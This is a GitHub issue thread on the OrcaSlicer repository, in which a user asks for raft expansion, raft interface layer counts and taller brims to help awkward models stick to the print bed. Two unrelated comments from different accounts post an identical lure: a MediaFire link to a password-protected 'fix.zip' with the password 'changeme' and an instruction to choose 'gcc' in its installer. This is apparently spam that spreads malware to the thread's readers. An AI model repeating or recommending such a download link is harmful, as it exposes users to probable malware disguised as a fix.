### ISSUE TITLE
Raft and Brim : Some options are sorely lacking

### ISSUE THREAD

**Issue by ValCT** [SoftFever/OrcaSlicer#6566]
### Is there an existing issue for this feature request?

- [X] I have searched the existing issues

### Is your feature request related to a problem?

In it's present state, Orcaslicer doesn't allow to print certain kind of models due to insufficient configurability of bed adhesion enhancement features (typically, models that expand in size as Z grows).
Here are pics of a model that is never going to stick at the bed despite enabling Raft, Brim or even Skirt.
![Brim](https://github.com/user-attachments/assets/e5ea7256-2b29-4595-a04b-e0b18d901702)
![Skirt](https://github.com/user-attachments/assets/56ebfad1-75a2-447a-8663-d5d09a7a87c7)
![Raft](https://github.com/user-attachments/assets/e1ec270a-a926-49e1-ab6a-68600f8e1141)

### Which printers will be beneficial to this feature?

All

### Describe the solution you'd like

I suggest adding the following options :

- Raft : Expansion option (so that it can reflect the model real size when only a small surface of it is in contact with the bed)
- Raft : Number of layers for bed interface (helps a lot to fight against shrinking in my experience)

- Brim : Brim height (Not to be limited to one layer height. I used to use brims as high as 2 mm to ensure adhesion of some tricky parts) 

### Describe alternatives you've considered

Drawing the adhesion features at the CAD stage, but it is impacting workflow.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ValCT** [comment]
Today's work : Here is the perfect example of a part that wouldn't be printable with OrcaSlicer witout designing a custom adhesion solution.
![Capture d'écran 2024-09-07 112015](https://github.com/user-attachments/assets/cd5a5ed9-dc70-4a74-a93c-35c1536c6a50)
